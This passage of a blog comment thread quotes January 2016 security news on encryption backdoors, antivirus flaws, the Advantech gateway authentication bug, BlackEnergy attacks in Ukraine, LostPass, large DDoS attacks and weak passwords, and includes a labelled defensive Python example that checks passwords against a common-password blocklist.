    There’s a consensus on this among mathematicians and cybersecurity experts. Encrypting data protects everything. It raises a wall that keeps out everyone. Forcing companies to keep an extra set of keys to unlock customer data makes them a target for foreign spies and criminal hackers too.

    “I know encryption represents a particular challenge for the FBI,” Hayden said. “But on balance, I actually think it creates greater security for the American nation than the alternative: a backdoor.”

    One of the attendees at the conference, Swedish cybersecurity expert Robert Malmgren, said the ex-NSA director recognizes a simple fact: It’s impossible to regulate a free, widely available software.

    “The bad guys will break the law anyway,” Malmgren said. “If encryption is outlawed, they don’t care. They don’t care about laws.”

    At times, the debate over encryption is overblown. In some cases, police actually have the capability to overcome encryption anyway.

    Reply
  24. Tomi Engdahl says:

    Antivirus software could make your company more vulnerable
    http://www.computerworld.com/article/3020445/security/antivirus-software-could-make-your-company-more-vulnerable.html?token=%23tk.CTWNLE_nlt_computerworld_security_2016-01-11&idg_eid=051598d6597df87056c54033166b3242&utm_source=Sailthru&utm_medium=email&utm_campaign=Computerworld%20Security%202016-01-11&utm_term=computerworld_security#tk.cw_nlt_computerworld_security_issues_2016-01-11

    Security researchers are worried that critical vulnerabilities in antivirus products are too easy to find and exploit

    Imagine getting a call from your company’s IT department telling you your workstation has been compromised and you should stop what you’re doing immediately. You’re stumped: You went through the company’s security training and you’re sure you didn’t open any suspicious email attachments or click on any bad links; you know that your company has a solid patching policy and the software on your computer is up to date; you’re also not the type of employee who visits non-work-related websites while on the job. So, how did this happen?

    A few days later, an unexpected answer comes down from the security firm that your company hired to investigate the incident: Hackers got in by exploiting a flaw in the corporate antivirus program installed on your computer, the same program that’s supposed to protect it from attacks. And all it took was for attackers to send you an email message that you didn’t even open.

    This scenario might sound far-fetched, but it’s not. According to vulnerability researchers who have analyzed antivirus programs in the past, such attacks are quite likely, and may already have occurred. Some of them have tried to sound the alarm about the ease of finding and exploiting critical flaws in endpoint antivirus products for years.

    Since June, researchers have found and reported several dozen serious flaws in antivirus products from vendors such as Kaspersky Lab, ESET, Avast, AVG Technologies, Intel Security (formerly McAfee) and Malwarebytes. Many of those vulnerabilities would have allowed attackers to remotely execute malicious code on computers, to abuse the functionality of the antivirus products themselves, to gain higher privileges on compromised systems and even to defeat the anti-exploitation defenses of third-party applications.

    Exploiting some of those vulnerabilities required no user interaction and could have allowed the creation of computer worms

    Attacks on the horizon

    Evidence suggests that attacks against antivirus products, especially in corporate environments, are both possible and likely. Some researchers believe that such attacks have already occurred, even though antivirus vendors might not be aware of them because of the very small number of victims.

    The intelligence agencies of various governments have long had an interest in antivirus flaws.

    Reply
  25. Tomi Engdahl says:

    Andy Greenberg / Wired:
    Silk Road’s dream of a free-trade zone on the dark web is dead: a collection of untrustworthy black market bazaars have failed to replace the Silk Road — The Silk Road’s Dark-Web Dream Is Dead — Not so long ago, the Silk Road was not only a bustling black market for drugs …

    The Silk Road’s Dark-Web Dream Is Dead
    http://www.wired.com/2016/01/the-silk-roads-dark-web-dream-is-dead/

    Not so long ago, the Silk Road was not only a bustling black market for drugs but a living representation of every cryptoanarchist’s dream: a trusted trading ground on the Internet where neither the government’s laws nor the Drug War they’ve spawned could reach. Today, that illicit narco-utopia is long gone, its once-secret server in an evidence storage room and its creator Ross Ulbricht fighting a last ditch appeal to escape life in prison.

    But more than two years since the FBI’s Silk Road takedown, the dark web markets Ulbricht inspired are suffering a less tangible but more fundamental kind of failure: the Silk Road’s dream has died, too.

    Over the last year, buyers and sellers in the dark web’s underground economy have been shaken again and again when the cryptographically hidden marketplaces they use to trade contraband goods ranging from drugs to stolen credit cards to forgeries have suddenly disappeared. More often than not, those disappearances involve the sites’ administrators running off with a significant chunk of their customers’ money.

    The result has been that the libertarian free-trade zone that the Silk Road once stood for has devolved into a more fragmented, less ethical, and far less trusted collection of scam-ridden black market bazaars. Instead of the Silk Road’s principled—if still very illegal—alternative to the violence and unpredictable products of street dealers, the dark web’s economy has become nearly as shady as the Internet back alley politicians and moralizing TV pundits have long compared it to.

    Dark web market admins are learning that “if you’re trustworthy, you stay up for a while, the heat increases, and eventually you get nailed by the feds,” says Nick Weaver, a Berkeley computer science researcher who has studied the Silk Road and other dark web markets. Instead, more and more markets are opting to “exit scam,” stealing the bitcoins users have stored in escrow and in their on-site accounts and going offline without warning. “The most viable exit strategy,” Weaver says, “is to rip and run.”

    Reply
  26. Tomi Engdahl says:

    Now there is a hurry: “Safe Harbor is too important to fail”

    Brussels – Concerns about NSA snooping and uncertainty about the future of the Safe Harbor procedure were highlighted when Microsoft’s General Counsel Brad Smith spoke at a data protection conference organized by Carnegie Europe in Brussels on Monday.

    “Safe Harbor is too important to be allowed to fall over,”

    “Europeans must be able to continue to be confident that their data is secure and their privacy is catered for,”

    Smith likened the development of data protection to a pendulum. “After the 9/11 attacks, surveillance was expanded and the laws were tightened everywhere. The Snowden revelations turned the pendulum in the other direction, and now is the time to emphasize the importance of data protection and human rights.”

    But the United States and the NSA are not the only parties interested in the information. 90 per cent of European data has been on European servers, and the level of data protection laws in the EU Member States varies greatly.

    “In the early days of the Internet the idea was that the net would be completely free. Now the situation is different: when data moves around the earth, the law must follow along with it,” Smith described.

    However, the law is seriously lagging behind technological development.

    In the US especially, the laws are still at the same level as they were in 1986.

    Smith believes that Americans and Europeans will find a common ground on data protection – but it takes time and persistent work.

    Source: http://www.tivi.fi/Kaikki_uutiset/nyt-on-kiire-safe-harbor-on-liian-tarkea-kaatuakseen-6246060

    Reply
  27. Tomi Engdahl says:

    Security flaw in Advantech gateway leaves industrial equipment open on the net – any password works

    A manufacturer programming mistake left Advantech gateways, used embedded in industrial devices, open to anyone. Advantech’s TCP/IP gateways allow serial-port-equipped industrial equipment to be connected to the Internet for remote management.

    Advantech last updated the equipment last fall and removed the hard-coded SSH server password from the gateways. However, the update did not fix an even bigger problem: the modified SSH server accepts any password.

    The problem was found by researchers at the company Rapid7. The vulnerability affects version 1.98 of the operating system software of the Advantech EKI-1322 gateway, published in the autumn. The most recent version, 2.00, published at the end of December, corrects the problem.

    Rapid7 says that the problem arose when the SSH server, called Dropbear, was modified so much that it no longer enforces the required user authentication.

    Source: http://www.tivi.fi/Kaikki_uutiset/turva-aukko-jattaa-teollisuuslaitteet-auki-nettiin-mika-tahansa-salasana-kay-6246028

    Reply
  28. Tomi Engdahl says:

    SCADA “Selfies” a Big Give Away To Hackers
    http://it.slashdot.org/story/16/01/19/0310229/scada-selfies-a-big-give-away-to-hackers

    The world’s governments are on notice that their critical infrastructure is vulnerable after an apparent cyberattack darkened 80,000 households in three regions of Ukraine last month. But on the question of safeguarding utilities, operators of power plants, water treatment facilities, and other industrial operations might do well to worry more about Instagram than hackers, according to a report by Christian Science Monitor Passcode. Speaking at a gathering of industrial control systems experts last week, Sean McBride of the firm iSight Partners said that social media oversharing is a wellspring of information that could be useful to attackers interested in compromising critical infrastructure. Among the valuable information he’s found online: workplace selfies on Instagram and Facebook that reveal details of supervisory control and data acquisition, or SCADA, systems.

    “No SCADA selfies!” said Mr. McBride at the S4 Conference in Miami Thursday. “Don’t make an adversary’s job easier.” iSight has found examples of SCADA selfies at sensitive facilities and warns that such photos may unwittingly reveal critical information that operators would prefer to keep secret.

    Worried about cyberattacks on US power grid? Stop taking selfies at work
    http://www.csmonitor.com/World/Passcode/2016/0115/Worried-about-cyberattacks-on-US-power-grid-Stop-taking-selfies-at-work?cmpid=TW

    Experts warn that malicious hackers gain valuable insight when companies and employees reveal too much information on the Web – especially when they work at sensitive facilities.

    The world’s governments are on notice that their critical infrastructure is vulnerable after an apparent cyberattack darkened 80,000 households in three regions of Ukraine last month.

    Social media oversharing is a wellspring of information that could be useful to attackers interested in compromising critical infrastructure, said Sean McBride, senior threat intelligence analyst at iSight Partners. Among the valuable information he’s found online: workplace selfies on Instagram and Facebook that reveal details of supervisory control and data acquisition, or SCADA, systems.

    iSight has found numerous examples of SCADA selfies at sensitive facilities and warns that such photos may unwittingly reveal critical information that operators would prefer to keep secret. The firm’s researchers have also discovered panoramic pictures of control rooms and video walk-throughs of facilities.

    In addition to posting videos and photos on the Web, corporate websites can divulge valuable information to adversaries. For instance, organization charts or lists of employees with contact information accessible via the utility website are valuable sources of information for would-be attackers, says McBride.

    These kinds of easily accessible images have aided critical infrastructure attacks in the past.

    In 2011, industrial control systems expert Ralph Langner used an image of a SCADA control system monitor in one of the photos to match the configuration of the Natanz centrifuges to configuration information in the Stuxnet malicious software created to hobble the facility.

    Today, McBride said that he and fellow researchers have used open-source information from media, government, and private sources to identify 15 facilities in the US that are critical to the operation of the electric grid.

    McBride suggested that critical infrastructure operators think like hackers before posting photos online: “Ask yourself, ‘What do my adversaries know about me and the organizations I support.’ “

    Reply
  29. Tomi Engdahl says:

    Ukraine claims that Russia launched a cyber attack on Kiev airport
    Can’t we all just get along?
    http://www.theinquirer.net/inquirer/news/2442200/ukraine-claims-that-russia-launched-a-cyber-attack-on-kiev-airport

    UKRAINE HAS accused unfriendly neighbour Russia of hacking into computing systems at Kiev airport.

    Worse than that, perhaps, is the threat of BlackEnergy malware, the use of which came to us via the security industry earlier this month. This new terror was used against Ukrainian utility firms recently, according to ESET, and more than likely has a Russian theme tune.

    A report on Reuters said the attack on Kiev airport used BlackEnergy and has been officially tagged by the military as being of Russian origin.

    “The control centre of the server, where the attacks originate, is in Russia,” military spokesman Andriy Lysenko confirmed to Reuters, while the airport people raised the spectre of BlackEnergy by saying that the authorities are looking into it.

    The Ukrainian state-run Computer Emergency Response Team (CERT UA) has waved the update stick and recommended that anyone who is responsible for any kind of network should get on top of their log files and look for anything unusual.

    Ukraine says to review cyber defenses after airport targeted from Russia
    http://www.reuters.com/article/us-ukraine-cybersecurity-malware-idUSKCN0UW0R0

    Ukrainian authorities will review the defenses of government computer systems, including at airports and railway stations, after a cyber attack on Kiev’s main airport was launched from a server in Russia, officials told Reuters on Monday.

    Malware similar to that which attacked three Ukrainian power firms in late December was detected last week in a computer in the IT network of Kiev’s main airport, Boryspil. The network includes the airport’s air traffic control.

    Although there is no suggestion at this stage that Russia’s government was involved, the cyber attacks have come at a time of badly strained relations between Ukraine and Russia over a nearly two-year-long separatist conflict in eastern Ukraine.

    Ukraine’s state-run Computer Emergency Response Team (CERT-UA) issued a warning on Monday of the threat of more attacks.

    “The control center of the server, where the attacks originate, is in Russia,” military spokesman Andriy Lysenko said by telephone, adding that the malware had been detected early in the airport’s system and no damage had been done.

    Reply
  30. Tomi Engdahl says:

    LastPass admits to a phishing problem and boosts two-factor authentication
    Don’t panic. It looks like LastPass did that for you
    http://www.theinquirer.net/inquirer/news/2442216/lastpass-admits-to-a-phishing-problem-and-boosts-two-factor-authentication

    LASTPASS HAS REACTED to reports about its place in a phishing problem by explaining things away and wrapping what’s left in barbed wire and promises.

    The information is delivered as a response to work done by a security researcher called Sean Cassidy who discovered the possibility of the phishing attack and released the code on GitHub. He reckons that its use will yield the guts of a LastPass account.

    “I call this attack LostPass. LostPass works because LastPass displays messages in the browser that attackers can fake. Users can’t tell the difference between a fake LostPass message and the real thing because there is no difference. It’s pixel-for-pixel the same notification and log-in screen,” Cassidy said in a blog post.

    LastPass replied in a blog post that the company jumped right to work on the problem and has gone about nailing planks of wood across virtual doors and that kind of thing.

    “The first line of defence that LastPass has introduced is preventing the malicious page from actually logging the user out of LastPass. Even though the malicious page shows a fake LastPass notification saying the user has been logged out and needs to log-in again, the user can see that the LastPass extension itself in their browser toolbar is still logged in,” the firm explained.

    sean cassidy : LostPass
    https://www.seancassidy.me/lostpass.html

    Reply
  31. Tomi Engdahl says:

    Advantech authentication forgets the authentication part
    Industrial gateways also carry a debugging backdoor
    http://www.theregister.co.uk/2016/01/19/advantech_authentication_forgets_the_authentication_part/

    Advantech’s EKI series of Modbus-to-TCP/IP gateways have a critical authentication bug, according to HD Moore of Rapid7.

    Back in December, Moore made a bunch of disclosures about the same product (including Shellshock and Heartbleed exposure).

    His latest discovery is that the EKI’s Dropbear SSH daemon isn’t authenticating users.

    “As of the 1.98 version of the firmware, the Dropbear daemon included had been heavily modified. As a result, it does not actually enforce authentication. During testing, any user is able to bypass authentication by using any public key and password”, the company writes.

    Advantech has since patched the two bugs
    http://support.advantech.com/support/DownloadSRDetail_New.aspx?SR_ID=1-T2M6NY&Doc_Source=Download

    Reply
  32. Tomi Engdahl says:

    Facebook flushes cash and time into anti-bullying
    Mark Zuckerberg continues to bask in benevolence
    By Dave Neal
    http://www.theinquirer.net/inquirer/news/2442316/facebook-flushes-cash-and-time-into-anti-bullying

    21ST CENTURY gossip and petrol station Facebook has come out swinging in favour of the little man and has launched the Berlin-based Online Civil Courage Initiative (OCCI) and asked people to share just a bit more personal information about themselves.

    Mark Zuckerberg, the big man on his self-made campus, has been keen on doing the right thing recently and often has his efforts thrown back in his face.

    These days he has big cash and big power and the means to do something to hit the bullies back, hence the OCCI which was announced on Facebook, which makes sense.

    The idea is for people to share their bad experiences on Facebook. This would create open discussion, reopen old wounds, and give some people the opportunity to shill ‘Man Up’ books at internet users.

    “Together we can ensure that the voices of peace, truth and tolerance will be heard. The best cure for bad ideas are good ideas. The best remedy for hate is tolerance. Counter speech is incredibly strong – and it takes time, energy and courage.

    Reply
  33. Tomi Engdahl says:

    Hyatt Hotel guests should be on credit card high alert
    You done mighta got hacked
    http://www.theinquirer.net/inquirer/news/2442234/recent-hyatt-hotel-guests-should-be-on-credit-card-high-alert

    ROADSIDE BEDROOM FACILITATOR the Hyatt Hotel chain has released a whack of detail about a hack on the firm last year and warned that customers may have details that are lost in the wild.

    The hack was reported by internet equaliser Brian Krebs in December. Hyatt provided a statement at the time, but Krebs suggested that it was light on detail.

    “A small percentage of the at-risk cards were used at spas, golf shops, car parks and a limited number of front desks, or provided to a sales office during this period. The at-risk window for a limited number of locations began on or shortly after 30 July 2015.”

    That is a long time in this business we call security and Hyatt has been advised to see whether it is doing the right things, particularly in terms of point-of-sale (PoS) systems and hacking. PoS systems, as we have learned already, can be a very weak link in the chain.

    “It appears that a good portion of breached data came from the restaurant side of the hotel chain’s facilities,”

    “These are often integrated PoS [systems] running applications in an environment that is not as secure as modern hardened payment terminals designed to capture payment data and implement encryption independent from the PoS itself. Such PoS systems are thus a target for payment-specific malware.

    Reply
  34. Tomi Engdahl says:

    Bitcoin mainstay withdraws funds and knowhow from ‘failed experiment’
    Wait till they see our genetically engineered waspadillo
    http://www.theinquirer.net/inquirer/news/2442261/bitcoin-mainstay-withdraws-funds-and-knowhow-from-failed-experiment

    A MAJOR PROPONENT of the bitcoin cryptocurrency has labelled it a “failed project” and withdrawn his support.

    Zurich-based developer and ex-Googler Mike Hearn published a blog post this weekend in which he announced that he had sold all his bitcoins and retired from developing for the virtual currency.

    The currency has increased hugely in popularity since its inception, but this has created a whole host of problems, ranging from its rapid (and, let’s face it, predictable) adoption as the currency of criminals, to its increasing complexity on the technical side which is making transactions slow down or fail entirely. Some even predict that the infrastructure will actually grind to a complete halt one day.

    The resolution of the Bitcoin experiment
    https://medium.com/@octskyward/the-resolution-of-the-bitcoin-experiment-dabb30201f7#.lmfvt09zg

    Reply
  35. Tomi Engdahl says:

    Adblock urges advertising companies to follow its criteria for acceptable ads, a feat that surely makes it the bore at the cocaine content confab.

    Ad blocking is not just a tool of content pirates who would rather stem revenue streams than stare at flashing gifs; the dangerous and explosive rise of malvertising gives blockers, including script blockers, a major security benefit since it reduces net user exposure to ransomware and other malware.

    Source: http://www.theregister.co.uk/2016/01/19/adblock_party_flops_have_invite_to_admen_confab_slop_chopped/

    Reply
  36. Tomi Engdahl says:

    Super-computers aren’t super-secure
    US National Science Foundation flings US$5 million at scientific computing infosec
    http://www.theregister.co.uk/2016/01/18/nsf_sees_gaps_in_hpc_security_pours_in_money/

    America’s National Science Foundation is slinging US$5 million to help improve the security of scientific high-performance computing (HPC) infrastructure.

    The money will be spent by the Center for Trustworthy Scientific Cyberinfrastructure (CTSC), run by the universities of Illinois and Wisconsin-Madison, and the Pittsburgh Supercomputing Centre (PSC).

    Reply
  37. Tomi Engdahl says:

    20KB trojan turns on banks in Singapore, Indonesia
    Fifth Tinba iteration ‘Tinbapore’ found and flagged
    http://www.theregister.co.uk/2016/01/19/bite_size_thief_now_raiding_asia_pac_banks/

    The infamous Tinba financial trojan has been updated and is now targeting banks in the Asia Pacific region.

    Malware bods from security company F5 refer to the fifth iteration of the trojan as Tinbapore since it began moving 70 percent of its infection base to the region.

    About 30 percent of infections are located in Singapore and 20 percent in Indonesia. Only five percent are in Australia.

    Reply
  38. Tomi Engdahl says:

    Clinton Hints At Tech Industry Compromise Over Encryption
    http://it.slashdot.org/story/16/01/18/1659205/clinton-hints-at-tech-industry-compromise-over-encryption

    At the Democratic presidential debate last night, Marques Brownlee asked the candidates a pointed question about whether the government should require tech companies to implement backdoors in their encryption, and how we should balance privacy with security. The responses were not ideal for those who recognize the problems with backdoors. Martin O’Malley said the government should have to get a warrant, but skirted the rest of the issue. Bernie Sanders said government must “have Silicon Valley help us”

    But the most interesting comment came from Hillary Clinton. After mentioning that Obama Administration officials had “started the conversation” with tech companies on the encryption issue

    Reply
  39. Tomi Engdahl says:

    Paul Lilly / Maximum PC:
    Intel announces sixth generation Core vPro processors with Intel Authenticate, an embedded multifactor authentication technology — Intel Bakes Multifactor Authentication into 6th Generation Core vPro Platform — Intel Authenticate brings security to a new level

    Intel Bakes Multifactor Authentication into 6th Generation Core vPro
    http://www.maximumpc.com/intel-bakes-multifactor-authentication-into-6th-generation-core-vpro-platform/

    Intel Authenticate brings security to a new level

    “Older laptops can cost businesses $4,203 per year, for every three PCs, in maintenance and lost productivity. ”

    Increased Security

    There have been a lot of security breaches over the past couple of years. According to Intel, over half of today’s data breaches start with misused or stolen credentials.

    To buck this trend, Intel is previewing a new security solution called Intel Authenticate. It’s an embedded multifactor authentication technology that uses a combination of up to three identifying factors at the same time, those being something you know, something you have, and something you are.

    “By doing so, the most common software based attacks that steal user credentials through viruses or malware are rendered ineffective. Intel delivers a secure PIN, a Bluetooth proximity factor with your Android or iPhone, a logical location factor with vPro systems and fingerprint biometrics. IT can choose the number and combination of factors they desire depending on their security needs and preferences for their users,” explains Garrison, Vice President and General Manager of Intel Business and Client Platforms.

    Intel Authenticate Identity Protection Intel IT Center
    https://www.youtube.com/watch?v=0gFZG7uLHtU

    Intel® Authenticate is a breakthrough in identity protection. Storing multi-factor security credentials and IT policies in hardware instead of in the operating system or third-party software makes it harder for advanced threats to reach them.

    Reply
  40. Tomi Engdahl says:

    European human rights court rules mass surveillance illegal
    Decision may kill off UK government spying law
    http://www.theregister.co.uk/2016/01/20/human_rights_court_rules_mass_surveillance_illegal/

    The European Court of Human Rights (ECHR) has ruled that mass surveillance is illegal, in a little-noticed case in Hungary.

    In a judgment last week, the court ruled that the Hungarian government had violated article 8 of the European Convention on Human Rights (the right to privacy) due to its failure to include “sufficiently precise, effective and comprehensive” measures that would limit surveillance to only people it suspected of crimes.

    The court said the Hungarian government should be required to interpret the law in a narrow fashion and “verify whether sufficient reasons for intercepting a specific individual’s communications exist in each case.”

    Or in other words, every individual case must be looked at carefully and a decision made on each. Which is clearly impossible if the law is taken to carry out mass surveillance, i.e., hoovering up information over the internet and then searching in it.

    The court made repeated references to another recent ECHR decision in December in which the Russian government was also found to have violated the same section for its mass surveillance of telephone calls.

    It should be noted that the decision does not ban the surveillance of citizens, nor does it require judicial oversight of such surveillance orders. But it is quite clear that such surveillance must be targeted at an individual and not used more broadly.

    So what’s the impact?

    The decision cannot stop the UK government, for example, from passing legislation that allows for mass surveillance.

    But it does mean that if the UK does, it will almost certainly be taken to the ECHR and found to have violated the European Convention. The UK government can of course continue to ignore that ruling, but it would face fines and it would lose international standing and reputation.

  41. Tomi Engdahl says:

    Microsoft: We’ve taken down the botnets. Europol: Would Sir like a kill switch, too?
    It’s like pulling a smoking car off the road … hang on
    http://www.theregister.co.uk/2016/01/19/microsoft_botnets_kill_switch/

    Last December, Microsoft intercepted traffic on users’ PCs and helped break up a botnet. And nobody complained. So the company very tentatively asked at a session on ethics and policy in Brussels this week whether it should do more.

    John Frank, Microsoft’s VP of European Government Affairs, explained how Microsoft had helped white hats, the FBI and Europol take the Dorkbot botnet infrastructure offline.

    “We detect when your PC is infected and ‘phones home’ as much as four times an hour. We then redirect that back to our sink hole and identify that with our national computers, and work to get those machines cleaned up,” said Frank.

    But he hinted it could do more, with greater information sharing and co-ordination between technology companies, CERTS and crime fighters.

    “I wonder if we’re being ambitious enough with our cybersecurity policy?”

    More co-operation could pay dividends, Frank suggested, with platform companies like Microsoft and ISPs working more closely with Europol. Why should an “unsafe” (infected, remotely controlled) PC be permitted on the internet, when an unsafe car isn’t?

    “Perhaps we should treat it as a health issue,” he mused.

    Speaking for Europol, Olivier Burgersdijk, of the body’s European Cybercrime Centre, agreed in principle.

    “In your car you would immediately be stopped if something wasn’t working.” The same could apply to PCs that are “being infected and… being used for committing crimes.”

    But Europol doesn’t have the authority to do more than it already can, he noted.

    Kill switches are now mandatory on Californian phones, but disabling an infected PC doesn’t necessarily mean installing a “kill switch” at platform level. It could entail diverting traffic from known bad IP addresses, something Windows already does with your consent.

    And a kill switch is at odds with Microsoft’s view on backdoors for government encryption – the company is against them.

  42. Tomi Engdahl says:

    Bigger than Safe Harbor: Microsoft prez vows to take down US gov in data protection lawsuit
    All your stuff is readable by Uncle Sam. Worldwide
    http://www.theregister.co.uk/2016/01/18/microsoft_irish_warrant_case_data_protection_safe_harbor/

    Europeans should sit up and take more notice of Microsoft’s lawsuit against the US government over secret access to their data.

    Why? Because it affects much more of their data than the Safe Harbour case, according to Microsoft president and lead counsel Brad Smith.

    “The Department of Justice does not need to wait for data to come to the United States to examine it,” he explained. “It can force countries to give it your data without disclosing that access to government, or complying with any European law.”

    Smith said 90 per cent of Europeans’ data is affected by the Irish warrant case; far more data than is affected by the transatlantic flows governed by safe harbour rules, which Austrian Max Schrems exploded in a European court ruling last year.

    Microsoft has sued the US government, challenging its right to access European data in its Dublin data centre. The government can do so because it recognises no territorial limits to US power in its laws: everywhere in the world is the United States.

    Smith called it the “defining privacy issue for 2016”. 82 per cent of Facebook’s global user base is served by Dublin.

    Microsoft’s chief lawyer thought a safe harbour replacement would be reached eventually. Yet, because it’s “too important to fail”, it may not succeed in the current round of negotiations, which are set to end by January 31st.

    But he said it wouldn’t happen just with wishful thinking. The US, having promised to end bulk data collection on its citizens, needed to do a lot more.

    Smith didn’t sell his “trustee model” as a cure-all, though. Designed to rebuild trust in American companies post-Schrems, the trustee model sees data ownership and management handed to a European company, in the first instance a subsidiary of Deutsche Telekom.

  43. Tomi Engdahl says:

    Intel Thwarts Hackers
    New vPro Hardware Unites Business
    http://www.eetimes.com/document.asp?doc_id=1328715&

    Intel announced its 6th Generation Core processors at the Gamecon Congress 2015 (Aug. 5-9, Cologne, Germany); however, they left out secret details about new vPro on-chip hardware important to business uses. Of the half dozen new hardware capabilities in 6th Gen vPro Cores, the most important are Authenticate and Unite, both of which use on-chip hardware Intel claims is unhackable to verify the identity of users and to allow them to project their screens onto any WiDi (wireless display) in the world, respectively.

    “Authenticate is a new never-before-seen capability,” Garrison told EE Times. “It allows IT [the information technology department of a business] to guarantee the authenticity of a user using two, three or more factors, making break-ins from stolen credentials virtually a thing of the past.”

    Authenticate offers up to four other factors supported by what it claims is unhackable on-chip hardware, including PIN, proximity (of your phone via Bluetooth), your location (at office, at home or other defined location) and biometrics (such as fingerprint or retina scan).

    The other “big deal” with the 6th Gen VPro Cores for business, according to Intel, is its new Unite on-chip hardware. Unite allows business users to enter a six-digit PIN to display on any WiDi equipped display—usually in a conference room in the world—complete with integrated Skype for Business.

    Intel® Authenticate Technology: Hardware-Enhanced Security
    http://www.intel.com/content/www/us/en/architecture-and-technology/authenticate/intel-authenticate-is-hardware-enhanced-security.html

    Today, more than half of data breaches start with misused or stolen user credentials. Eight-character passwords that change every 90 days worked well a decade ago, but increasingly sophisticated attack methods like password cracking, phishing, or screen scraping reveal the need for stronger identity protection. To better protect user credentials, organizations need to strengthen software-only security.

    Intel is leading the way with a new kind of multifactor authentication where PCs are an integral part of the solution. Intel® Authenticate Technology on the 6th generation Intel® Core™ vPro™ processor is a multifactor authentication solution that strengthens identity protection for the enterprise. It supports combining a variety of hardware-enhanced factors at the same time to validate a user’s identity, including ‘something you know’ (such as a PIN); ‘something you have’ (such as a mobile phone); and ‘something you are’ (such as a fingerprint). You can tailor the combination of hardened identity factors based on what works best for your business.

    With Intel Authenticate Technology, PIN, biometrics, keys, tokens and associated certificates are captured, encrypted, matched, and stored in the hardware, out of sight and reach from typical attack methods.

    Identity Protection That Works for IT

    Intel Authenticate Technology enables flexible policy configuration and enforcement using familiar PC management features and centralized tools. Policy administration, application distribution, and related fleet management all operate per your usual business processes.

  44. Tomi Engdahl says:

    602 Gbps! This May Have Been the Largest DDoS Attack in History
    Friday, January 08, 2016 Swati Khandelwal
    http://thehackernews.com/2016/01/biggest-ddos-attack.html?m=1

    Cyber attacks are getting evil and becoming the worst nightmare for companies day by day, and the Distributed Denial of Service (DDoS) attack is one of the favorite weapons for hackers to temporarily suspend services of a host connected to the Internet.

    Until now, nearly every big website had been a victim of this attack, and the most recent one was conducted against the BBC’s websites and Republican presidential candidate Donald Trump’s main campaign website over this past holiday weekend.

    Of the two, the largest DDoS attack in history was carried out against the BBC website: over 600 Gbps.

    The group calling itself New World Hacking claimed responsibility for taking down both the BBC’s global website and Donald Trump’s website.

    “New World Hacking” group had claimed responsibility for launching a DDoS attack against BBC, as a “test of its capabilities.”

    One of the members of the New World Hacking group, who identified himself as Ownz, claimed that the group allegedly used their own tool called BangStresser to launch a DDoS attack of up to 602 Gbps on the BBC’s website.

    As proof, the group provided ZDNet a screenshot of a web interface that was allegedly used to attack the BBC website.

    Although the authenticity of the screenshot has not been verified, if the attack size is proven true, it would vastly surpass the largest DDoS attack record of 334 Gbps, recorded by Arbor Networks last year.

    The recent massive DDoS attack apparently utilizes two Amazon Web Services servers that employ a large number of automated detection and mitigation techniques in order to prevent the misuse of the services, Amazon previously claimed.

    “We have our ways of bypassing Amazon,” said Ownz. “The best way to describe it is we tap into a few administrative services that Amazon is use to using. The [sic] simply set our bandwidth limit as unlimited and program our own scripts to hide it.”

    More details about the attack have not yet been disclosed, but Ownz claimed that their main purpose behind the development of the BangStresser DDoS tool is to unmask ISIS and possibly end its online propaganda.

  45. Tomi Engdahl says:

    It’s 2016 and idiots still use ‘123456’ as their password
    Just think how many of this lot are your own users…
    http://www.theregister.co.uk/2016/01/20/leaked_passwords_hopelessly_lame/

    Put your head in your hands, sysadmins: the usual weak suspects continue to make up the top 25 most used passwords.

    The ubiquitous “123456” remains the most popular password among web users, followed by “password” in a list of user credentials leaked online last year.

    “Qwerty” appears in fourth place of the list of compromised credentials put together by password management outfit SplashData.

    Further down the list “dragon”, “football” and “batman” all make their debuts as new entries.

    Security experts warn that easy-to-remember passwords are increasingly easily guessed by potential attackers.

    Matt Marx, an information security consultant at MWR InfoSecurity, said: “In order to crack users’ passwords, researchers and attackers alike use powerful GPU password cracking rigs. The rig that MWR uses can perform over 20 billion guesses a second against Microsoft Windows password hashes. In fact, a user that had a password in the top 25 passwords would have their password guessed by such a rig in under a second.”

    Web users need to mix things up.

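A defender-side check of the kind this comment calls for, added here as an example that is not part of the article or of SplashData’s or MWR’s tooling: a candidate password is screened against a leaked-password list (with case folding, leetspeak and trailing-digit normalization) and its brute-force time is estimated at the 20 billion guesses per second MWR quotes. The blocklist is a constructed sample built around the entries the article names, not the real SplashData list, and the ten-year acceptance threshold is an assumption.

```python
"""Password blocklist check plus crack-time estimate (added example,
not code from the article). Rate: 20 billion guesses/s, as quoted by
MWR InfoSecurity for its GPU rig against Windows password hashes."""
import re
import string

# Constructed sample blocklist: the entries the article names
# ("123456", "password", "qwerty", "dragon", "football", "batman")
# padded with other commonly leaked strings. Not the real SplashData list.
COMMON_PASSWORDS = {
    "123456", "password", "12345678", "qwerty", "12345", "123456789",
    "football", "1234", "1234567", "baseball", "welcome", "abc123",
    "111111", "1qaz2wsx", "dragon", "master", "monkey", "letmein",
    "login", "princess", "qwertyuiop", "solo", "passw0rd", "starwars",
    "batman",
}

GUESSES_PER_SECOND = 20_000_000_000  # figure quoted by MWR InfoSecurity
TEN_YEARS = 10 * 365 * 24 * 3600      # assumed acceptance threshold

# Undo the leet substitutions users apply to dodge naive blocklists.
LEET = str.maketrans("01345@$!", "oieasasi")

CHAR_CLASSES = (string.ascii_lowercase, string.ascii_uppercase,
                string.digits, string.punctuation)


def normalize(pw):
    """Fold case, drop trailing digits/punctuation, then undo leetspeak,
    so that 'P@ssw0rd2016!' collapses to 'password'."""
    stripped = re.sub(r"[\d\W_]+$", "", pw.lower())
    return stripped.translate(LEET)


def is_common(pw):
    """True if the password, raw or normalized, is on the blocklist."""
    return pw.lower() in COMMON_PASSWORDS or normalize(pw) in COMMON_PASSWORDS


def keyspace(pw):
    """Brute-force space implied by the character classes actually used."""
    alphabet = sum(len(cls) for cls in CHAR_CLASSES if any(c in cls for c in pw))
    return alphabet ** len(pw)


def time_to_crack_seconds(pw, rate=GUESSES_PER_SECOND):
    """Exhaustive-search time at `rate`; a blocklisted password falls to a
    dictionary pass of at most len(COMMON_PASSWORDS) guesses."""
    if is_common(pw):
        return len(COMMON_PASSWORDS) / rate
    return keyspace(pw) / rate


def assess(pw):
    """Verdict a registration form or password filter could act on."""
    seconds = time_to_crack_seconds(pw)
    return {
        "blocklisted": is_common(pw),
        "seconds_to_crack": seconds,
        "acceptable": not is_common(pw) and seconds > TEN_YEARS,
    }


if __name__ == "__main__":
    for candidate in ("123456", "P@ssw0rd2016!", "Tr0ub4dor&3"):
        print(candidate, assess(candidate))
```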
  46. Tomi Engdahl says:

    Senior Homeland Security Official Says Internet Anonymity Should Be Outlawed
